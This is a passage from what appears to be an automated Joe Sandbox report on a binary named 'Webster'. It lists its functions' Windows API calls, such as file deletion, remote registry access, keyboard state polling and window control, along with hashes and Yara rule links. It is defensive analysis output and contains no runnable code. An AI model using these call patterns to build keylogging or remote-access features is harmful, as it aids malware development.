                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00AE9A0D
                                                                                  • _wcsncpy.LIBCMT ref: 00AE9A80
                                                                                  • DeleteFileW.KERNEL32(?,?), ref: 00AE9AB6
                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AE9ACC
                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AE9ADD
                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AE9AEF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                  • String ID:
                                                                                  • API String ID: 1500180987-0
                                                                                  • Opcode ID: 5da06501f3057f5d0b96b8e419705d47d6038dfb4b53d4fd13463ff0d391d3f8
                                                                                  • Instruction ID: 3095023f62ac59f50fe565d7bb0aae3c1f0f154f901b7a083ea9bab1da3feeb1
                                                                                  • Opcode Fuzzy Hash: 5da06501f3057f5d0b96b8e419705d47d6038dfb4b53d4fd13463ff0d391d3f8
                                                                                  • Instruction Fuzzy Hash: B5C13BB1A00218AADF21DF95CD85EDFB7BDAF49340F0040AAF609E7151EB709A858F65
                                                                                  Function 00A95BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00A95BF1
                                                                                  • GetMenuItemCount.USER32(00B47890), ref: 00AD0E7B
                                                                                  • GetMenuItemCount.USER32(00B47890), ref: 00AD0F2B
                                                                                  • GetCursorPos.USER32(?), ref: 00AD0F6F
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00AD0F78
                                                                                  • TrackPopupMenuEx.USER32(00B47890,00000000,?,00000000,00000000,00000000), ref: 00AD0F8B
                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AD0F97
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                  • String ID:
                                                                                  • API String ID: 2751501086-0
                                                                                  • Opcode ID: 192a7dea67b8a985c883df7a3e3c55a268a2492bb4dcffe7dea91ff83a28959b
                                                                                  • Instruction ID: cab97db5cce7f61a7fc6afe098db7ab369d69d1d87f2c2afea590e0c72f00b87
                                                                                  • Opcode Fuzzy Hash: 192a7dea67b8a985c883df7a3e3c55a268a2492bb4dcffe7dea91ff83a28959b
                                                                                  • Instruction Fuzzy Hash: D371E330A44609BFEF219B65CC85FAABFA9FF04364F244217F515A62D1CBB1A850DB90
                                                                                  Function 00AD83FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                  • _memset.LIBCMT ref: 00AD8489
                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00AD84BE
                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00AD84DA
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00AD84F6
                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00AD8520
                                                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00AD8548
                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AD8553
                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AD8558
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                  • API String ID: 1411258926-22481851
                                                                                  • Opcode ID: 04784ad22b747d12018abf9147975b2245e92bc795f385894595daab571eb491
                                                                                  • Instruction ID: 906e5ff5acd6ec8a9590a181f2135083653b01afff53c29e91e91692f9802743
                                                                                  • Opcode Fuzzy Hash: 04784ad22b747d12018abf9147975b2245e92bc795f385894595daab571eb491
                                                                                  • Instruction Fuzzy Hash: 0041F872D1022EABCF11EBA4DD95DEDB7B8FF04340F404569F816A3261EA759E44CB90
                                                                                  Function 00B0147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper
                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                  • API String ID: 3964851224-909552448
                                                                                  • Opcode ID: 0d7ce15418cb88c83e97b9dce18ab3681a5badb6ccf46ee4b3a03324a9e5d23f
                                                                                  • Instruction ID: f97a8a8cf1eb4a383f772ff72ba877b3be9fe0ddeaaf45cba8c5088abeb68a74
                                                                                  • Opcode Fuzzy Hash: 0d7ce15418cb88c83e97b9dce18ab3681a5badb6ccf46ee4b3a03324a9e5d23f
                                                                                  • Instruction Fuzzy Hash: E0411B3250025A8BDF08EF94D981AEA3BA4FF62344F604895FC526B292DB30ED19CB50
                                                                                  Function 00AE5882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                    • Part of subcall function 00A9153B: _memmove.LIBCMT ref: 00A915C4
                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00AE58EB
                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00AE5901
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AE5912
                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00AE5924
                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00AE5935
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: SendString$_memmove
                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                  • API String ID: 2279737902-1007645807
                                                                                  • Opcode ID: d686f9ca0b805fe397c4b2d3a7500d4353998188bb9d9dfe2fdb93aac5080395
                                                                                  • Instruction ID: 318a1e3be6267dc776b9cd56e925c2e4713f7a41b799c236314b008154d045e4
                                                                                  • Opcode Fuzzy Hash: d686f9ca0b805fe397c4b2d3a7500d4353998188bb9d9dfe2fdb93aac5080395
                                                                                  • Instruction Fuzzy Hash: 16118231A9016AB9DB20A7A2DC5ADFF7BBCEBD1B50F900469B501A30E5EE601D05C5A0
                                                                                  Function 00AE4C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                  • String ID: 0.0.0.0
                                                                                  • API String ID: 208665112-3771769585
                                                                                  • Opcode ID: 374f4454a247837197c99afcb686ff8763d787d858b072ae1ad23049ebe6bd28
                                                                                  • Instruction ID: 58fe7ac41c4177cd3c89b18483b0751537cdf81b8907058fe57355a5b157bc8c
                                                                                  • Opcode Fuzzy Hash: 374f4454a247837197c99afcb686ff8763d787d858b072ae1ad23049ebe6bd28
                                                                                  • Instruction Fuzzy Hash: 3011E431919118AFDB11BB759D4AEEE77BCDF89710F1441A5F005970D1EFB099C18B90
                                                                                  Function 00AE5530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • timeGetTime.WINMM ref: 00AE5535
                                                                                    • Part of subcall function 00AA0859: timeGetTime.WINMM(?,00000002,00A8C22C), ref: 00AA085D
                                                                                  • Sleep.KERNEL32(0000000A), ref: 00AE5561
                                                                                  • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00AE5585
                                                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00AE55A7
                                                                                  • SetActiveWindow.USER32 ref: 00AE55C6
                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00AE55D4
                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00AE55F3
                                                                                  • Sleep.KERNEL32(000000FA), ref: 00AE55FE
                                                                                  • IsWindow.USER32 ref: 00AE560A
                                                                                  • EndDialog.USER32(00000000), ref: 00AE561B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                  • String ID: BUTTON
                                                                                  • API String ID: 1194449130-3405671355
                                                                                  • Opcode ID: d80f3b42bf5e0b3fa32a6c855bdfff5729391f7f5d938aea8bb32f6973332d46
                                                                                  • Instruction ID: 95c45389d1388ad709da7183f100617b37f8d6b0f66363651d80d990f274c6d1
                                                                                  • Opcode Fuzzy Hash: d80f3b42bf5e0b3fa32a6c855bdfff5729391f7f5d938aea8bb32f6973332d46
                                                                                  • Instruction Fuzzy Hash: 2A21D178A04644AFEB416F71FD88A7A3B6AFB56348F445018F001831A1CFB18E90DA31
                                                                                  Function 00AEDBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                                                    • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                                                  • CoInitialize.OLE32(00000000), ref: 00AEDC2D
                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00AEDCC0
                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00AEDCD4
                                                                                  • CoCreateInstance.OLE32(00B13D4C,00000000,00000001,00B3B86C,?), ref: 00AEDD20
                                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00AEDD8F
                                                                                  • CoTaskMemFree.OLE32(?,?), ref: 00AEDDE7
                                                                                  • _memset.LIBCMT ref: 00AEDE24
                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00AEDE60
                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00AEDE83
                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00AEDE8A
                                                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00AEDEC1
                                                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 00AEDEC3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                  • String ID:
                                                                                  • API String ID: 1246142700-0
                                                                                  • Opcode ID: ac99e7c75e76baf078e3b9ec01c7f385fd1c0fcef0c94aad103013d23712eb92
                                                                                  • Instruction ID: 652b5b1d63dc317ac7cc9e028d66bcdae65bf95b47358597ad2cb3db93ee8ac3
                                                                                  • Opcode Fuzzy Hash: ac99e7c75e76baf078e3b9ec01c7f385fd1c0fcef0c94aad103013d23712eb92
                                                                                  • Instruction Fuzzy Hash: 86B1E975A00109AFDB14EFA5C989DAEBBF9FF88304B148459F906EB261DB70ED41CB50
                                                                                  Function 00AE081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?), ref: 00AE0896
                                                                                  • SetKeyboardState.USER32(?), ref: 00AE0901
                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00AE0921
                                                                                  • GetKeyState.USER32(000000A0), ref: 00AE0938
                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00AE0967
                                                                                  • GetKeyState.USER32(000000A1), ref: 00AE0978
                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00AE09A4
                                                                                  • GetKeyState.USER32(00000011), ref: 00AE09B2
                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00AE09DB
                                                                                  • GetKeyState.USER32(00000012), ref: 00AE09E9
                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00AE0A12
                                                                                  • GetKeyState.USER32(0000005B), ref: 00AE0A20
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: State$Async$Keyboard
                                                                                  • String ID:
                                                                                  • API String ID: 541375521-0
                                                                                  • Opcode ID: 10db3c47cdef1a76adfcf512a8b9c7903b67318393f79779b78c64e87a959fe4
                                                                                  • Instruction ID: 6a8fb85d9b486da75056955d4c20d7fb509b7a40067e872e83ee3bbb5f2bc478
                                                                                  • Opcode Fuzzy Hash: 10db3c47cdef1a76adfcf512a8b9c7903b67318393f79779b78c64e87a959fe4
                                                                                  • Instruction Fuzzy Hash: D851B870A047D829FB35EBB24550BAABFB49F11380F488599D5C2571C3DAE49ACCCBA1
                                                                                  Function 00ADCE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00ADCE1C
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00ADCE2E
                                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00ADCE8C
                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00ADCE97
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00ADCEA9
                                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00ADCEFD
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00ADCF0B
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00ADCF1C
                                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00ADCF5F
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00ADCF6D
                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00ADCF8A
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00ADCF97
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                  • String ID:
                                                                                  • API String ID: 3096461208-0
                                                                                  • Opcode ID: f45da88f257a7c2cea42ddd1d5f1cd8a1a148141604b6b599c5b21e54e1dd420
                                                                                  • Instruction ID: a1d0915670c199780f843d40b73ed8735f2956b82015b6b6941eb7036d55cee9
                                                                                  • Opcode Fuzzy Hash: f45da88f257a7c2cea42ddd1d5f1cd8a1a148141604b6b599c5b21e54e1dd420
                                                                                  • Instruction Fuzzy Hash: 4C516271B10205AFDF18DF69CD89AAEBBB6EB88710F54812DF516D7290DBB0AD40CB50
                                                                                  Function 00A823F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A81F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A82412,?,00000000,?,?,?,?,00A81AA7,00000000,?), ref: 00A81F76
                                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00A824AF
                                                                                  • KillTimer.USER32(-00000001,?,?,?,?,00A81AA7,00000000,?,?,00A81EBE,?,?), ref: 00A8254A
                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00ABBFE7
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A81AA7,00000000,?,?,00A81EBE,?,?), ref: 00ABC018
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A81AA7,00000000,?,?,00A81EBE,?,?), ref: 00ABC02F
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A81AA7,00000000,?,?,00A81EBE,?,?), ref: 00ABC04B
                                                                                  • DeleteObject.GDI32(00000000), ref: 00ABC05D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                  • String ID:
                                                                                  • API String ID: 641708696-0
                                                                                  • Opcode ID: 8e09a0afe9f8385a5d69fde51639adee5613eacb3ba7ab77e12ec6aaaf9c9f93
                                                                                  • Instruction ID: 855b56e229e78838ccbc1b551019f69a53ac0c8b04908b493e9c0b83c536cec1
                                                                                  • Opcode Fuzzy Hash: 8e09a0afe9f8385a5d69fde51639adee5613eacb3ba7ab77e12ec6aaaf9c9f93
                                                                                  • Instruction Fuzzy Hash: 4361DA30164601DFCB25BF15CD48B7AB7F1FB41322F508929E4824BAA1CBB1AD90DFA0
                                                                                  Function 00A82581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A829AB: GetWindowLongW.USER32(?,000000EB), ref: 00A829BC
                                                                                  • GetSysColor.USER32(0000000F), ref: 00A825AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ColorLongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 259745315-0
                                                                                  • Opcode ID: 9e402e4772f67a47f6915ac3a53356ce83794a34025210f8b5387e9244d7af9d
                                                                                  • Instruction ID: 0677e9830392cd669a9e1d844be19174304c5cffbde23065dee6903d350382a8
                                                                                  • Opcode Fuzzy Hash: 9e402e4772f67a47f6915ac3a53356ce83794a34025210f8b5387e9244d7af9d
                                                                                  • Instruction Fuzzy Hash: B641D331000144AFDB247F289C88BF93B66FB0A331F584265FD669B1E6EB748D81DB21
                                                                                  Function 00A929BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AA0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00A92A3E,?,00008000), ref: 00AA0BA7
                                                                                    • Part of subcall function 00AA0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A92A58,?,00008000), ref: 00AA02A4
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A92ADF
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00A92C2C
                                                                                    • Part of subcall function 00A93EBE: _wcscpy.LIBCMT ref: 00A93EF6
                                                                                    • Part of subcall function 00AA386D: _iswctype.LIBCMT ref: 00AA3875
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
